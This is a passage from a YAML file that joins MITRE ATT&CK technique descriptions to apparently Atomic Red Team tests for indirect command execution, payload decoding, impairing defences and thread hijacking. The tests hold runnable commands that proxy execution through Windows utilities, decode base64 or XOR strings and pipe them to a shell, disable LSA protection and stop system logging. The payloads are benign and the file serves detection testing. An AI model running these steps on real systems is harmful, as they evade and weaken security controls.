'
name: powershell
elevation_required: false
T1202:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1202
external_id: T1202
- source_name: Bleeping Computer - Scriptrunner.exe
description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
tool to deploy malware. Retrieved July 8, 2024.
url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Threat Actor Targets the Manufacturing industry with Lumma Stealer
and Amadey Bot
description: Cyble. (2024, December 5). Threat Actor Targets the Manufacturing
industry with Lumma Stealer and Amadey Bot. Retrieved February 4, 2025.
url: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/
- source_name: Evi1cg Forfiles Nov 2017
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
September 12, 2024.
url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
- source_name: Secure Team - Scriptrunner.exe
description: Secure Team - Information Assurance. (2023, January 8). Windows
Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
- source_name: SS64
description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
description: vector_sec. (2017, August 11). Defenders watching launches of
cmd? What about forfiles?. Retrieved September 12, 2024.
url: https://x.com/vector_sec/status/896049052642533376
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:40.495Z'
name: Indirect Command Execution
description: |-
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1202
atomic_tests:
- name: Indirect Command Execution - pcalua.exe
auto_generated_guid: cecfea7a-5f03-4cdd-8bc8-6f7c22862440
description: |
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
Upon execution, calc.exe should open
supported_platforms:
- windows
input_arguments:
payload_path:
description: Path to payload
type: path
default: C:\Windows\System32\calc.exe
process:
description: Process to execute
type: string
default: calc.exe
executor:
command: |
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
name: command_prompt
- name: Indirect Command Execution - forfiles.exe
auto_generated_guid: 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc
description: |
forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Forfiles.yml)
"This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
Upon execution calc.exe will be opened.
supported_platforms:
- windows
input_arguments:
process:
description: Process to execute
type: string
default: calc.exe
executor:
command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
'
name: command_prompt
- name: Indirect Command Execution - conhost.exe
auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29
description: |
conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer.
Executing it through command line can create process ancestry anomalies
[Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)
supported_platforms:
- windows
input_arguments:
process:
description: Process to execute
type: string
default: notepad.exe
executor:
command: 'conhost.exe "#{process}"
'
name: command_prompt
- name: Indirect Command Execution - Scriptrunner.exe
auto_generated_guid: 0fd14730-6226-4f5e-8d67-43c65f1be940
description: |-
The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting. Upon test execution, calc.exe should open
Reference: https://x.com/NickTyrer/status/914234924655312896
supported_platforms:
- windows
input_arguments:
payload_path:
description: Path to the executable
type: String
default: C:\Windows\System32\calc.exe
executor:
command: Scriptrunner.exe -appvscript "#{payload_path}"
cleanup_command:
name: powershell
elevation_required: false
- name: Indirect Command Execution - RunMRU Dialog
auto_generated_guid: de323a93-2f18-4bd5-ba60-d6fca6aeff76
description: "Simulates execution of commands via the Windows Run dialog (Win+R)
by programmatically opening the Run dialog, \ncopying a command to clipboard,
and automating the paste and execution. This generates artifacts in the RunMRU
registry key,\nwhich is commonly abused by threat actors to execute malicious
commands disguised as CAPTCHA verification steps.\nUpon execution, a test
PowerShell command will be executed through the Run dialog.\n"
supported_platforms:
- windows
input_arguments:
command:
description: Command to execute via Run dialog
type: string
default: calc.exe
executor:
name: powershell
command: |
# Copy command to clipboard
Set-Clipboard -Value '#{command}'
# Open Run dialog
Start-Process -FilePath "powershell" -ArgumentList "-c (New-Object -ComObject 'Shell.Application').FileRun()" -WindowStyle Hidden
# Wait for Run dialog to open
Start-Sleep -Seconds 1
# Paste command and execute
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.SendKeys]::SendWait('^v')
Start-Sleep -Milliseconds 500
[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
T1140:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1140
external_id: T1140
- source_name: Volexity PowerDuke November 2016
description: 'Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election
Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January
11, 2017.'
url: https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
- source_name: Sentinel One Tainted Love 2023
description: Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen.
(2023, March 23). Operation Tainted Love | Chinese APTs Target Telcos in
New Attacks. Retrieved March 18, 2025.
url: https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/
- source_name: Malwarebytes Targeted Attack against Saudi Arabia
description: Malwarebytes Labs. (2017, March 27). New targeted attack against
Saudi Arabia Government. Retrieved July 3, 2017.
url: https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/
- source_name: Carbon Black Obfuscation Sept 2016
description: Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved
February 12, 2018.
url: https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:40.925Z'
name: Deobfuscate/Decode Files or Information
description: |-
Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b or type command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- Red Canary
- Cristóbal Martínez Martín
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.4'
identifier: T1140
atomic_tests:
- name: Deobfuscate/Decode Files Or Information
auto_generated_guid: dc6fe391-69e6-4506-bd06-ea5eeb4082f8
description: |
Encode/Decode executable
Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder
supported_platforms:
- windows
input_arguments:
executable:
description: name of executable
type: path
default: C:\Windows\System32\calc.exe
executor:
command: |
certutil -encode #{executable} %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe
cleanup_command: |
del %temp%\T1140_calc.txt >nul 2>&1
del %temp%\T1140_calc_decoded.exe >nul 2>&1
name: command_prompt
- name: Certutil Rename and Decode
auto_generated_guid: 71abc534-3c05-4d0c-80f7-cbe93cb2aa94
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
'
supported_platforms:
- windows
input_arguments:
executable:
description: name of executable/file to decode
type: path
default: C:\Windows\System32\calc.exe
executor:
command: |
copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -encode #{executable} %temp%\T1140_calc2.txt
%temp%\tcm.tmp -decode %temp%\T1140_calc2.txt %temp%\T1140_calc2_decoded.exe
cleanup_command: |
del %temp%\tcm.tmp >nul 2>&1
del %temp%\T1140_calc2.txt >nul 2>&1
del %temp%\T1140_calc2_decoded.exe >nul 2>&1
name: command_prompt
- name: Base64 decoding with Python
auto_generated_guid: 356dc0e8-684f-4428-bb94-9313998ad608
description: 'Use Python to decode a base64-encoded text string and echo it
to the console
'
supported_platforms:
- linux
- macos
input_arguments:
message:
description: Message to print to the screen
type: string
default: Hello from Atomic Red Team test T1140!
encoded_file:
description: File to temporarily save encoded text
type: path
default: "/tmp/T1140.encoded"
dependencies:
- description: 'Python must be present
'
prereq_command: 'which python3
'
get_prereq_command: 'echo "Please install Python 3"
'
executor:
name: sh
elevation_required: false
command: |
ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())')
python3 -c "import base64;dec=base64.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "import base64 as d;dec=d.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode;dec=b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode as d;dec=d(\"$ENCODED\");print(dec.decode())"
echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())"
echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())"
- name: Base64 decoding with Perl
auto_generated_guid: 6604d964-b9f6-4d4b-8ce8-499829a14d0a
description: "Use Perl to decode a base64-encoded text string and echo it to
the console \n"
supported_platforms:
- linux
- macos
input_arguments:
message:
description: Message to print to the screen
type: string
default: Hello from Atomic Red Team test T1140!
encoded_file:
description: File to temporarily save encoded text
type: path
default: "/tmp/T1140.encoded"
dependencies:
- description: 'Perl must be present
'
prereq_command: 'which perl
'
get_prereq_command: 'echo "Please install Perl"
'
executor:
name: sh
elevation_required: false
command: |
ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));")
perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));"
echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64());'
echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));'
- name: Base64 decoding with shell utilities
auto_generated_guid: b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e
description: 'Use common shell utilities to decode a base64-encoded text string
and echo it to the console
'
supported_platforms:
- linux
- macos
input_arguments:
message:
description: Message to print to the screen
type: string
default: Hello from Atomic Red Team test T1140!
encoded_file:
description: File to temporarily save encoded text
type: path
default: "/tmp/T1140.encoded"
executor:
name: sh
elevation_required: false
command: |
ENCODED=$(echo '#{message}' | base64)
printf $ENCODED | base64 -d
echo $ENCODED | base64 -d
echo $(echo $ENCODED) | base64 -d
echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}
echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
- name: Base64 decoding with shell utilities (freebsd)
auto_generated_guid: b6097712-c42e-4174-b8f2-4b1e1a5bbb3d
description: 'Use common shell utilities to decode a base64-encoded text string
and echo it to the console
'
supported_platforms:
- linux
input_arguments:
message:
description: Message to print to the screen
type: string
default: Hello from Atomic Red Team test T1140!
encoded_file:
description: File to temporarily save encoded text
type: path
default: "/tmp/T1140.encoded"
executor:
name: sh
elevation_required: false
command: |
ENCODED=$(echo '#{message}' | b64encode -r -)
printf $ENCODED | b64decode -r
echo $ENCODED | b64decode -r
echo $(echo $ENCODED) | b64decode -r
echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}
echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r
- name: FreeBSD b64encode Shebang in CLI
auto_generated_guid: 18ee2002-66e8-4518-87c5-c0ec9c8299ac
description: "Using b64decode shell scripts that have Shebang in them. This
is commonly how attackers obfuscate passing and executing a shell script.
Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
for it. \n"
supported_platforms:
- linux
input_arguments:
bash_encoded:
description: Encoded
type: string
default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
dash_encoded:
description: Encoded
type: string
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
fish_encoded:
description: Encoded
type: string
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
sh_encoded:
description: Encoded
type: string
default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
dependencies:
- description: 'b64decode must be present
'
prereq_command: 'which b64decode
'
get_prereq_command: 'echo "please install b64decode"
'
executor:
name: sh
elevation_required: false
command: |
echo #{bash_encoded} | b64decode -r | sh
echo #{dash_encoded} | b64decode -r | sh
echo #{fish_encoded} | b64decode -r | sh
echo #{sh_encoded} | b64decode -r | sh
- name: Hex decoding with shell utilities
auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973'
description: 'Use common shell utilities to decode a hex-encoded text string
and echo it to the console
'
supported_platforms:
- linux
- macos
input_arguments:
message:
description: Message to print to the screen
type: string
default: Hello from Atomic Red Team test T1140!
encoded_file:
description: File to temporarily save encoded text
type: path
default: "/tmp/T1140.encoded"
dependencies:
- description: 'xxd must be present
'
prereq_command: 'which xxd
'
get_prereq_command: 'echo "Please install xxd"
'
executor:
name: sh
elevation_required: false
command: |
ENCODED=$(echo '#{message}' | xxd -ps -c 256)
printf $ENCODED | xxd -r -p
echo $ENCODED | xxd -r -p
echo $(echo $ENCODED) | xxd -r -p
echo $ENCODED > #{encoded_file} && xxd -r -p #{encoded_file}
echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
- name: Linux Base64 Encoded Shebang in CLI
auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
description: "Using Linux Base64 Encoded shell scripts that have Shebang in
them. This is commonly how attackers obfuscate passing and executing a shell
script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
for it. \n"
supported_platforms:
- linux
- macos
input_arguments:
bash_encoded:
description: Encoded
type: string
default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
dash_encoded:
description: Encoded
type: string
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
fish_encoded:
description: Encoded
type: string
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
sh_encoded:
description: Encoded
type: string
default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
dependencies:
- description: 'base64 must be present
'
prereq_command: 'which base64
'
get_prereq_command: 'echo "please install base64"
'
executor:
name: sh
elevation_required: false
command: |
echo #{bash_encoded} | base64 -d | bash
echo #{dash_encoded} | base64 -d | bash
echo #{fish_encoded} | base64 -d | bash
echo #{sh_encoded} | base64 -d | bash
- name: XOR decoding and command execution using Python
auto_generated_guid: c3b65cd5-ee51-4e98-b6a3-6cbdec138efc
description: An adversary can obfuscate malicious commands or payloads using
XOR and execute them on the victim's machine. This test uses Python to decode
and execute commands on the machine.
supported_platforms:
- linux
- macos
input_arguments:
xor_key:
description: 'Key used to decrypt the command '
type: string
default: waEHleblxiQjoxFJQaIMLdHKz
encrypted_command:
description: Encrypted command that will be executed
type: string
default: AAkqKQEM
dependency_executor_name: bash
dependencies:
- description: Python3 must be installed
prereq_command: which python3
get_prereq_command: echo "Install Python3"
executor:
command: 'python3 -c ''import base64; import subprocess; xor_decrypt = lambda
text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()),
key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command,
key); subprocess.call(exec, shell=True)'''
cleanup_command:
name: bash
elevation_required: false
- name: Expand CAB with expand.exe
auto_generated_guid: 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
description: |
Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
Upon success, art-expand-source.txt is extracted next to the CAB.
supported_platforms:
- windows
input_arguments:
cab_path:
description: Path to the CAB to expand (created if missing)
type: path
default: "%TEMP%\\art-expand-test.cab"
output_dir:
description: Destination directory
type: path
default: "%TEMP%\\art-expand-out"
executor:
name: command_prompt
elevation_required: false
command: |
mkdir "#{output_dir}" >nul 2>&1
echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
pushd "#{output_dir}"
expand "#{cab_path}" -F:* .
popd
cleanup_command: |
del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
del "#{cab_path}" >nul 2>&1
rmdir "#{output_dir}" /s /q >nul 2>&1
T1562:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529
created: '2020-02-21T20:22:13.470Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
- source_name: Google Cloud Mandiant UNC3886 2024
description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.123Z'
name: Impair Defenses
description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jamie Williams (U ω U), PANW Unit 42
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
- Linux
- macOS
- Containers
- Network Devices
- Identity Provider
- Office Suite
- ESXi
x_mitre_version: '1.7'
identifier: T1562
atomic_tests:
- name: Windows Disable LSA Protection
auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
description: "The following Atomic adds a registry entry to disable LSA Protection.\n\nThe
LSA controls and manages user rights information, password hashes and other
important bits of information in memory. Attacker tools, such as mimikatz,
rely on accessing this content to scrape password hashes or clear-text passwords.
Enabling LSA Protection configures Windows to control the information stored
in memory in a more secure fashion - specifically, to prevent non-protected
processes from accessing that data.\nUpon successful execution, the registry
will be modified and RunAsPPL will be set to 0, disabling Lsass protection.\nhttps://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection\nhttps://blog.netwrix.com/2022/01/11/understanding-lsa-protection/\nhttps://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
\ \n"
supported_platforms:
- windows
executor:
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t
REG_DWORD /d 0 /f
'
cleanup_command: 'reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v
RunAsPPL /f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Disable journal logging via systemctl utility
auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
description: 'The atomic test disables the journal logging using built-in systemctl
utility
'
supported_platforms:
- linux
executor:
command: 'sudo systemctl stop systemd-journald #disables journal logging
'
cleanup_command: |
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
name: sh
elevation_required: true
- name: Disable journal logging via sed utility
auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
description: 'The atomic test disables the journal logging by searching and
replacing the "Storage" parameter to "none" within the journald.conf file,
thus any new journal entries will only be temporarily available in memory
and not written to disk
'
supported_platforms:
- linux
executor:
command: 'sudo sed -i ''s/Storage=auto/Storage=none/'' /etc/systemd/journald.conf
'
cleanup_command: |
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
name: sh
elevation_required: true
T1055.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6
created: '2020-01-14T01:28:32.166Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/003
external_id: T1055.003
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.433Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
Thread Execution Hijacking is a method of executing arbitrary code in the
address space of a separate live process. \n\nThread Execution Hijacking is
commonly performed by suspending an existing process then unmapping/hollowing
its memory, which can then be replaced with malicious code or the path to
a DLL. A handle to an existing victim process is first created with native
Windows API calls such as OpenThread. At this point the process
can be suspended then written to, realigned to the injected code, and resumed
via SuspendThread , VirtualAllocEx, WriteProcessMemory,
SetThreadContext, then ResumeThread respectively.(Citation:
Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012)
but targets an existing process rather than creating a process in a suspended
state. \n\nRunning code in the context of another process may allow access
to the process's memory, system/network resources, and possibly elevated privileges.
Execution via Thread Execution Hijacking may also evade detection from security
products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1055.003
atomic_tests:
- name: Thread Execution Hijacking
auto_generated_guid: 578025d5-faa9-4f6d-8390-aae527d503e1
description: 'This test injects a MessageBox shellcode generated by msfvenom
in Notepad.exe using Thread Execution Hijacking. When successful, a message
box will appear with the "Atomic Red Team" caption after one or two seconds. '
supported_platforms:
- windows
executor:
command: |-
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055.003\bin\InjectContext.exe"
Start-Sleep -Seconds 5
Stop-Process $notepad.id
name: powershell
T1036:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0
created: '2017-05-31T21:30:38.511Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
Retrieved September 12, 2024.
url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
- source_name: LOLBAS Main Site
description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and
also Libraries). Retrieved February 10, 2020.
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:42.609Z'
name: Masquerading
description: |-
